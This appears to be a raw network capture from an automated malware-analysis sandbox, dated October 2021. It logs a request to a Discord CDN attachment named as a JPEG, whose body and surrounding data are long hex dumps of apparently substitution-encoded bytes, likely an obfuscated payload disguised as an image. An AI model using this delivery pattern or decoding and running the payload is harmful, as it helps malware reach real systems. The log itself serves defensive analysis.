                                                                                                2021-10-26 15:35:12 UTC3237INData Raw: 20 69 4f 20 53 20 69 67 20 53 20 6e 50 20 53 20 6e 4d 20 53 20 54 54 4d 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 54 54 54 20 53 20 54 53 55 20 53 20 6e 4d 20 53 20 54 54 6e 20 53 20 55 54 20 53 20 54 53 54 20 53 20 50 70 20 53 20 4f 53 20 53 20 50 6e 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 54 4d 54 20 53 20 55 53 20 53 20 69 6e 20 53 20 54 54 53 20 53 20 50 69 20 53 20 55 4d 20 53 20 55 4d 20 53 20 54 54 53 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 50 67 20 53 20 54 53 67 20 53 20 70 70 20 53 20 6e 4d 20 53 20 6e 55 20 53 20 50 53 20 53 20 50 50 20 53 20 55 55 20 53 20 70 4f 20 53 20 54 54 4d 20 53 20 50 69 20 53 20 54 53 50 20 53 20 70 50 20 53 20 4f 55 20 53 20 69 67 20 53 20 55 70 20 53 20 55 69 20 53 20 69 4f 20 53 20 6e 4f 20 53 20 70 55 20
                                                                                                Data Ascii: iO S ig S nP S nM S TTM S TSp S TSg S TTT S TSU S nM S TTn S UT S TST S Pp S OS S Pn S On S TSi S TMT S US S in S TTS S Pi S UM S UM S TTS S TTU S TTP S Pg S TSg S pp S nM S nU S PS S PP S UU S pO S TTM S Pi S TSP S pP S OU S ig S Up S Ui S iO S nO S pU
                                                                                                2021-10-26 15:35:12 UTC3253INData Raw: 53 20 54 53 67 20 53 20 50 70 20 53 20 50 53 20 53 20 54 4d 54 20 53 20 50 69 20 53 20 54 54 69 20 53 20 50 53 20 53 20 6e 55 20 53 20 54 53 67 20 53 20 69 55 20 53 20 55 53 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 50 6e 20 53 20 6e 70 20 53 20 55 67 20 53 20 54 54 53 20 53 20 55 4d 20 53 20 70 55 20 53 20 4f 53 20 53 20 4f 6e 20 53 20 54 54 4f 20 53 20 6e 55 20 53 20 6e 50 20 53 20 54 54 55 20 53 20 55 4f 20 53 20 6e 50 20 53 20 50 50 20 53 20 55 6e 20 53 20 54 54 70 20 53 20 54 54 70 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 50 4d 20 53 20 50 50 20 53 20 55 54 20 53 20 70 50 20 53 20 4f 55 20 53 20 69 67 20 53 20 6e 4f 20 53 20 55 55 20 53 20 4f 4f 20 53 20 54 54 4d 20 53 20 54 53 67 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 70 70
                                                                                                Data Ascii: S TSg S Pp S PS S TMT S Pi S TTi S PS S nU S TSg S iU S US S TSM S TTT S Pn S np S Ug S TTS S UM S pU S OS S On S TTO S nU S nP S TTU S UO S nP S PP S Un S TTp S TTp S TMS S UT S TSn S PM S PP S UT S pP S OU S ig S nO S UU S OO S TTM S TSg S TTM S pP S pp
                                                                                                2021-10-26 15:35:12 UTC3269INData Raw: 70 20 53 20 70 4f 20 53 20 55 54 20 53 20 6e 6e 20 53 20 70 50 20 53 20 50 4d 20 53 20 6e 54 20 53 20 70 50 20 53 20 69 4f 20 53 20 55 50 20 53 20 70 4f 20 53 20 70 70 20 53 20 54 4d 53 20 53 20 6e 6e 20 53 20 6e 4d 20 53 20 55 50 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 50 20 53 20 4f 53 20 53 20 54 53 4f 20 53 20 50 6e 20 53 20 54 4d 54 20 53 20 4f 53 20 53 20 70 55 20 53 20 70 4f 20 53 20 55 4f 20 53 20 6e 6e 20 53 20 70 70 20 53 20 55 4f 20 53 20 6e 54 20 53 20 70 50 20 53 20 69 4f 20 53 20 55 50 20 53 20 70 4f 20 53 20 70 6e 20 53 20 54 53 69 20 53 20 6e 6e 20 53 20 55 53 20 53 20 55 50 20 53 20 50 53 20 53 20 55 70 20 53 20 54 53 70 20 53 20 54 53 53 20 53 20 6e 54 20 53 20 54 53 55 20 53 20 54 54 53 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 70
                                                                                                Data Ascii: p S pO S UT S nn S pP S PM S nT S pP S iO S UP S pO S pp S TMS S nn S nM S UP S PS S nS S TTP S OS S TSO S Pn S TMT S OS S pU S pO S UO S nn S pp S UO S nT S pP S iO S UP S pO S pn S TSi S nn S US S UP S PS S Up S TSp S TSS S nT S TSU S TTS S OU S TMT S p
                                                                                                2021-10-26 15:35:12 UTC3285INData Raw: 67 6e 20 53 20 54 54 69 20 53 20 67 6e 20 53 20 4f 6e 20 53 20 54 53 4d 20 53 20 54 54 6e 20 53 20 54 53 6e 20 53 20 54 54 4f 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 54 53 69 20 53 20 54 54 53 20 53 20 54 53 69 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 4f 6e 20 53 20 67 6e 20 53 20 54 67 20 53 20 54 53 20 53 20 67 6e 20 53 20 4f 55 20 53 20 54 53 4f 20 53 20 4f 55 20 53 20 54 53 55 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 54 53 4f 20 53 20 54 53 70 20 53 20 54 53 53 20 53 20 54 54 67 20 53 20 4f 6e 20 53 20 54 54 4f 20 53 20 54 53 69 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 54 4d 53 20 53 20 54 53 69 20 53 20 67 6e 20 53 20 4f
                                                                                                Data Ascii: gn S TTi S gn S On S TSM S TTn S TSn S TTO S TSS S gn S TTU S gn S TTU S TSi S TTS S TSi S TSO S TSP S TTT S TTU S On S gn S Tg S TS S gn S OU S TSO S OU S TSU S TMM S TTM S TSO S TSp S TSS S TTg S On S TTO S TSi S gn S TTP S gn S TTi S TMS S TSi S gn S O
                                                                                                2021-10-26 15:35:12 UTC3301INData Raw: 6e 20 53 20 54 54 67 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 54 4d 4d 20 53 20 54 53 54 20 53 20 54 53 6e 20 53 20 54 54 55 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 54 4d 53 20 53 20 54 53 4f 20 53 20 67 6e 20 53 20 4f 6e 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 54 54 50 20 53 20 54 54 70 20 53 20 54 4d 4d 20 53 20 54 54 69 20 53 20 54 53 69 20 53 20 54 53 6e 20 53 20 54 53 53 20 53 20 54 53 69 20 53 20 54 54 67 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 54 54 50 20 53 20 54 54 4f 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 54 54 6e 20 53 20 54 53 54 20 53 20 54 54 4f 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 54 54
                                                                                                Data Ascii: n S TTg S TSg S TSP S TMM S TST S TSn S TTU S TTp S TSP S TTO S TMS S TSO S gn S On S gn S TTi S TTT S TTO S TTP S TTp S TMM S TTi S TSi S TSn S TSS S TSi S TTg S gn S TTi S gn S OO S TTP S TTO S TSM S TTT S TTT S TTn S TST S TTO S gn S TTp S gn S OO S TT
                                                                                                2021-10-26 15:35:12 UTC3317INData Raw: 20 54 53 54 20 53 20 67 6e 20 53 20 54 67 20 53 20 54 53 20 53 20 67 6e 20 53 20 54 54 4f 20 53 20 54 54 53 20 53 20 4f 6e 20 53 20 54 53 70 20 53 20 54 53 4d 20 53 20 54 54 55 20 53 20 54 53 70 20 53 20 54 54 69 20 53 20 54 54 54 20 53 20 4f 55 20 53 20 54 4d 4d 20 53 20 54 53 69 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 4d 53 20 53 20 4f 6e 20 53 20 54 53 55 20 53 20 54 53 67 20 53 20 4f 6e 20 53 20 54 54 6e 20 53 20 54 53 53 20 53 20 54 53 54 20 53 20 54 53 55 20 53 20 54 53 69 20 53 20 54 54 4d 20 53 20 54 53 4d 20 53 20 54 53 50 20 53 20 67 6e 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 54 4d 4d 20 53 20 54 53 4d 20 53 20 54 53 70 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 54 53 55 20 53 20 54 4d 54 20 53 20 54 53 69 20 53 20
                                                                                                Data Ascii: TST S gn S Tg S TS S gn S TTO S TTS S On S TSp S TSM S TTU S TSp S TTi S TTT S OU S TMM S TSi S gn S OO S gn S TMS S On S TSU S TSg S On S TTn S TSS S TST S TSU S TSi S TTM S TSM S TSP S gn S TSS S gn S TMM S TSM S TSp S gn S gM S gn S TSU S TMT S TSi S
                                                                                                2021-10-26 15:35:12 UTC3333INData Raw: 54 70 20 53 20 54 53 54 20 53 20 54 53 4f 20 53 20 50 54 20 53 20 50 53 20 53 20 4f 4d 20 53 20 54 53 53 20 53 20 54 54 69 20 53 20 54 53 50 20 53 20 54 54 55 20 53 20 54 53 54 20 53 20 54 54 69 20 53 20 54 54 50 20 53 20 4f 4d 20 53 20 55 70 20 53 20 70 70 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 6e 6e 20 53 20 54 54 54 20 53 20 54 54 6e 20 53 20 54 54 50 20 53 20 54 53 54 20 53 20 69 70 20 53 20 54 54 50 20 53 20 54 4d 54 20 53 20 54 54 50 20 53 20 53 20 54 67 20 55 70 20 53 20 6e 6e 20 53 20 55 6e 20 53 20 70 50 20 53 20 55 4d 20 53 20 70 4f 20 53 20 53 20 70 4f 20 55 67 20 53 20 6e 4f 20 53 20 6e 53 20 53 20 55 69 20 53 20 55 6e 20 53 20 70 50 20 53 20 55 4d 20 53 20 70 4f 20 53 20 4f 4d 20 53 20 55 70 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 4f
                                                                                                Data Ascii: Tp S TST S TSO S PT S PS S OM S TSS S TTi S TSP S TTU S TST S TTi S TTP S OM S Up S pp S TTT S TMS S nn S TTT S TTn S TTP S TST S ip S TTP S TMT S TTP S S Tg Up S nn S Un S pP S UM S pO S S pO Ug S nO S nS S Ui S Un S pP S UM S pO S OM S Up S nn S TTO S O
                                                                                                2021-10-26 15:35:12 UTC3349INData Raw: 53 20 53 20 53 20 69 20 50 70 20 53 20 53 20 53 20 69 20 50 6e 20 53 20 53 20 53 20 69 20 50 55 20 53 20 53 20 53 20 69 20 50 4f 20 53 20 53 20 53 20 69 20 70 53 20 53 20 53 20 53 20 69 20 70 54 20 53 20 53 20 53 20 69 20 70 4d 20 53 20 53 20 53 20 69 20 70 20 54 6e 20 54 4d 55 20 54 70 69 20 69 20 70 50 20 53 20 53 20 53 20 69 20 70 70 20 53 20 53 20 53 20 69 20 70 6e 20 53 20 53 20 53 20 69 20 70 55 20 53 20 53 20 53 20 69 20 70 4f 20 53 20 53 20 53 20 69 20 6e 53 20 53 20 53 20 53 20 69 20 6e 54 20 53 20 53 20 53 20 69 20 6e 4d 20 53 20 53 20 53 20 69 20 6e 67 20 53 20 53 20 53 20 69 20 6e 69 20 53 20 53 20 53 20 69 20 6e 50 20 53 20 53 20 53 20 69 20 6e 70 20 53 20 53 20 53 20 69 20 6e 6e 20 53 20 53 20 53 20 69 20 6e 55 20 53 20 53 20 53 20 69 20 6e
                                                                                                Data Ascii: S S S i Pp S S S i Pn S S S i PU S S S i PO S S S i pS S S S i pT S S S i pM S S S i p Tn TMU Tpi i pP S S S i pp S S S i pn S S S i pU S S S i pO S S S i nS S S S i nT S S S i nM S S S i ng S S S i ni S S S i nP S S S i np S S S i nn S S S i nU S S S i n


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                4192.168.2.549752162.159.135.233443
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:12 UTC3360OUTGET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                Connection: Keep-Alive
                                                                                                2021-10-26 15:35:12 UTC3360INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:12 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 1023400
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0cfcef3323c-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2123
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "d3cdbf4cf600f86ad718adfd07a223c2"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:12 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:08 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252488534942
                                                                                                x-goog-hash: crc32c=wjkzZg==
                                                                                                x-goog-hash: md5=082/TPYA+GrXGK39B6Ijwg==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 1023400
                                                                                                X-GUploader-UploadID: ADPycdt5fSirEYMb_NkxzZKC7t6tFfhYM04DPAmKMeDPJgfPgiJTBhU38u8ZzkjplNBvCv9YQAkb-5YryF3oMIp-UKg
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=grSZCd%2B3R%2BHs1rNnKMW0p7i%2BA0TytUXOCGvVndt7K8BOWTqPhmnepHVUG%2Btcpcp%2FVtU%2BkDcpNx78m%2BhEglBQy29DnXrznqxWZpv2DyOjp6mY3dctZsw5FGjjTSaq6M9qqpkDPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:12 UTC3361INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:12 UTC3361INData Raw: 53 54 4d 67 69 50 70 6e 55 4f 2d 6e 6e 20 4f 53 20 54 69 69 20 53 20 67 20 53 20 53 20 53 20 69 20 53 20 53 20 53 20 4d 50 50 20 4d 50 50 20 53 20 53 20 54 55 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 4d 55 20 53 20 53 20 53 20 54 69 20 67 54 20 54 55 70 20 54 69 20 53 20 54 55 53 20 4f 20 4d 53 50 20 67 67 20 54 55 69 20 54 20 6e 70 20 4d 53 50 20 67 67 20 55 69 20 54 53 69 20 54 53 50 20 54 54 50 20 67 4d 20 54 54 4d 20 54 54 69 20 54 54 54 20 54 53 67 20 54 54 69 20 4f 6e 20 54 53 4f 20 67 4d 20 4f 4f 20 4f 6e 20 54 54 53 20 54
                                                                                                Data Ascii: STMgiPpnUO-nn OS Tii S g S S S i S S S MPP MPP S S TUi S S S S S S S pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S TMU S S S Ti gT TUp Ti S TUS O MSP gg TUi T np MSP gg Ui TSi TSP TTP gM TTM TTi TTT TSg TTi On TSO gM OO On TTS T
                                                                                                2021-10-26 15:35:12 UTC3363INData Raw: 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4d 50 20 69 53 20 4d 4d 4f 20 54 53 4f 20 54 54 50 20 50 53 20 69 55 20 50 53 20 50 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 69 70 20 54 69 67 20 50 53 20 69 55 20 54 67 55 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 54 4d 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20
                                                                                                Data Ascii: S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S MP iS MMO TSO TTP PS iU PS PS Ui TTi TTn Tip Tig PS iU TgU Pi Ui TTi TTn TSO TTM PS TTM PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU
                                                                                                2021-10-26 15:35:12 UTC3364INData Raw: 50 53 20 54 70 55 20 4d 69 50 20 50 50 20 55 69 20 54 54 69 20 55 50 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 55 20 50 54 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 54 55 20 50 69 20 55 69 20 54 55 20 4f 54 20 67 54 20 4d 54 20 4f 69 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 69 55 20 69 4f 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 50 67 20 54 53 4f 20 54 54 4d 20 54 54 4d 20 67 53 20 70 69
                                                                                                Data Ascii: PS TpU MiP PP Ui TTi UP TSO TTM PS MiU PT Pi Ui TTM TTn TSO TTM PS iU PS Pi Ui TTi TTn TSO TTM PS iU TU Pi Ui TU OT gT MT Oi OP UT Pi Ui TMp TTn TSO TTM PS iU iU Pi Ui TTM TTn TSO TTM MiU iO PS Pi Ui TTi TTn TSO TTM PS iU PS Pi Ui TTi Pg TSO TTM TTM gS pi
                                                                                                2021-10-26 15:35:12 UTC3365INData Raw: 69 20 70 4f 20 54 4d 20 54 54 70 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 69 20 50 69 20 55 69 20 54 4d 53 20 4f 50 20 54 53 4f 20 4f 4f 20 4d 20 69 4f 20 50 53 20 70 54 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 54 54 4d 20 50 53 20 67 67 20 6e 70 20 50 4d 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 6e 6e 20 50 53 20 69 55 20 50 70 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 55 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 50 69 20 55 53 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 69 20 69 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20 6e 70 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 69 20 69 55 20 67 67 20 70 20 55 50 20 54 54 69 20 54 4d 70 20 54 53 4f 20 54 54 4d 20 50 53 20 50 67 20 50 53 20 50 69 20 70 4f 20 54 4d 20 54 54 67 20 54 53 4f 20 54 54 4d
                                                                                                Data Ascii: i pO TM TTp TSO TTM Pi OP Ti Pi Ui TMS OP TSO OO M iO PS pT Ui TTi TTn TTS TTM PS gg np PM Ui TTi TTg M nn PS iU Pp MU Ui On pO TSU TTM Pn iU PS Pi US TTi TTn TMi Ti iO iU PS PS PO np TTn TSO TMM Mi iU gg p UP TTi TMp TSO TTM PS Pg PS Pi pO TM TTg TSO TTM
                                                                                                2021-10-26 15:35:12 UTC3367INData Raw: 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 54 4f 54 20 54 50 50 20 50 53 20 50 69 20 55 50 20 4f 53 20 70 54 20 54 53 4f 20 54 54 4d 20 50 70 20 70 6e 20 54 4d 67 20 50 69 20 55 69 20 54 4d 53 20 54 50 20 67 53 20 50 55 20 50 53 20 69 55 20 50 70 20 67 50 20 54 4d 54 20 54 54 67 20 55 67 20 6e 53 20 54 54 4f 20 54 6e 55 20 50 70 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 54 6e 20 54 4f 20 54 4d 53 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4f 4d 20 54 54 69 20 54 54 6e 20 54 54 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 70 69 20 4d 4f 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 69 20 50 69 20 50 69 20 55 69 20 55 4f 20 54 54 53 20 70 69 20 54 54 55 20 4d 53 20 4d 67 6e 20 6e 55 20 50 69 20
                                                                                                Data Ascii: U MMi ii gS TnT TTi TTn TSn TSM TOT TPP PS Pi UP OS pT TSO TTM Pp pn TMg Pi Ui TMS TP gS PU PS iU Pp gP TMT TTg Ug nS TTO TnU Pp PS Pi US UO TTn TO TMS PS iU Pi MgS OM TTi TTn TTU UU TTp iU PS pS pi MO pM TSO TTM Pp Mi Pi Pi Ui UO TTS pi TTU MS Mgn nU Pi
                                                                                                2021-10-26 15:35:12 UTC3368INData Raw: 6e 6e 20 4f 50 20 54 54 69 20 6e 50 20 55 55 20 54 53 67 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 55 69 20 4f 69 20 54 50 69 20 54 54 4d 20 69 4f 20 53 20 50 70 20 50 69 20 4f 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 55 20 54 53 54 20 55 55 20 54 53 70 20 55 70 20 4d 70 20 54 54 67 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 67 50 20 50 53 20 67 50 20 4d 20 50 53 20 55 69 20 54 54 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 67 20 4f 55 20 70 69 20 4f 55 20 4d 53 20 50 54 20 67 4f 20 69 67 20 54 4d 54 20 54 4d 50 20 55 67 20 70 4f 20 67 69 20 50 53 20 69 55 20 50 70 20 67 53 20 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 53 20 4d 53 20 4d
                                                                                                Data Ascii: nn OP TTi nP UU TSg iU PS pS TMp Ui Oi TPi TTM iO S Pp Pi OT TTi TTn TSO TTM PS iU PS PM nU TST UU TSp Up Mp TTg PS Pi Oi UU Ug nS TgP PS gP M PS Ui TTT TTn TSO TTM Pn iU PS gO Up TSg OU pi OU MS PT gO ig TMT TMP Ug pO gi PS iU Pp gS n TTi TTn TSg OS MS M
                                                                                                2021-10-26 15:35:12 UTC3369INData Raw: 55 20 50 53 20 50 53 20 50 4f 20 67 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 67 6e 20 50 54 20 50 69 20 55 4d 20 54 54 4d 20 4f 4f 20 4d 69 6e 20 69 20 50 70 20 69 55 20 50 53 20 69 50 20 6e 69 20 4f 50 20 54 4d 6e 20 6e 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 4f 70 20 4f 69 20 54 54 53 20 54 4d 4d 20 4d 50 20 54 4f 70 20 6e 70 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 53 6e 20 55 55 20 54 53 69 20 69 4f 20 50 53 20 69 55 20 54 4d 54 20 54 54 55 20 4f 55 20 54 53 4d 20 4f 54 20 69 55 20 67 55 20 50 6e 20 69 4f 20 54 4d 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 67 50 20 4d 20 50 67 20 55 69 20 70 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 69 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 53 20 4d 67 4f
                                                                                                Data Ascii: U PS PS PO gn TTn TSO TMM Mp gn PT Pi UM TTM OO Min i Pp iU PS iP ni OP TMn nP Ti P iU PS PS TMS Op Oi TTS TMM MP TOp np S Ui TTi TTg TSn UU TSi iO PS iU TMT TTU OU TSM OT iU gU Pn iO TMi TSO TTn TSO TTU Mi gP M Pg Ui pT TTn TSO TTM gi iU PS gO Up TSS MgO
                                                                                                2021-10-26 15:35:12 UTC3371INData Raw: 54 53 4f 20 54 54 55 20 6e 70 20 54 53 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 67 20 54 53 4f 20 54 54 4d 20 50 70 20 67 50 20 50 6e 20 54 69 20 54 4f 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 6e 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 55 20 67 50 20 50 50 20 6e 67 20 67 4f 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 70 20 50 53 20 69 55 20 50 70 20 4d 70 20 55 54 20 6e 69 20 53 20 54 53 4f 20 54 54 4d 20 50 53 20 67 4f 20 54 6e 55 20 70 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 53 55 20 4d 50 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 67 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20
                                                                                                Data Ascii: TSO TTU np TS PS Pi US MO ig TSO TTM Pp gP Pn Ti TOU TTi TTn TSO OU Pn Mi TSO Pi Ui TMS TSM TSp TTU gP PP ng gO Ui TTi TTg M Tp PS iU Pp Mp UT ni S TSO TTM PS gO TnU pg Ui TTi TTg nn MSU MP MMi ii gS TnT TTi TTn TSn On Pg nP gP Pi Ui TTU MiO gn TTM PS iO
                                                                                                2021-10-26 15:35:12 UTC3372INData Raw: 67 20 6e 53 20 54 4d 55 20 50 6e 20 4d 6e 20 54 4f 50 20 70 4f 20 54 4d 53 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 4d 69 20 50 55 20 50 53 20 50 67 20 54 6e 4d 20 69 50 20 50 55 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 54 50 20 54 53 53 20 54 53 4f 20 54 54 4d 20 50 69 20 50 70 20 69 55 20 69 4f 20 70 6e 20 69 4d 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 67 20 70 54 20 69 55 20 50 53 20 50 53 20 4f 4d 20 54 54 4d 20 54 54 69 20 54 54 6e 20 69 53 20 54 70 55 20 70 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 54 4d 50 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 50 4d 20 55 67 20 54 53 6e 20 69 50 20 4d 69 6e 20 4f 20 54 55 20
                                                                                                Data Ascii: g nS TMU Pn Mn TOP pO TMS TTi TTn TSn TMi PU PS Pg TnM iP PU TTn TSO TTg pn TMS PS Pi UP TP TSS TSO TTM Pi Pp iU iO pn iM MgO MS pp PS iU PT nT TSM TTi TTn TSU Tg pT iU PS PS OM TTM TTi TTn iS TpU pU TPg Pi Ui TTP U TMP TTM PS PM PU PM Ug TSn iP Min O TU
                                                                                                2021-10-26 15:35:12 UTC3373INData Raw: 55 69 20 54 54 67 20 70 4f 20 54 53 53 20 54 54 4d 20 4d 50 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 69 69 20 67 54 20 67 4f 20 54 54 69 20 55 69 20 54 54 4f 20 54 53 50 20 54 53 67 20 67 54 20 67 67 20 4d 53 20 54 70 20 55 70 20 54 54 4f 20 4f 55 20 70 69 20 4f 6e 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 4f 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 54 70 20 6e 6e 20 70 4d 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 54 67 50 20 54 67 20 70 67 20 69 55 20 50 53 20 50 53 20 54 4d 6e 20 54 50 4d 20 54 54 6e 20 54 4d 70 20 70 69 20 50 4d 20 69 55 20 54 55 54 20 50 69 20 55 69 20 54 54 69 20 4f 6e 20 54 53 4f 20 54 54 4d 20 67 50 20 50 53 20 67 6e 20 54 70 6e 20 70 70 20 4f 69 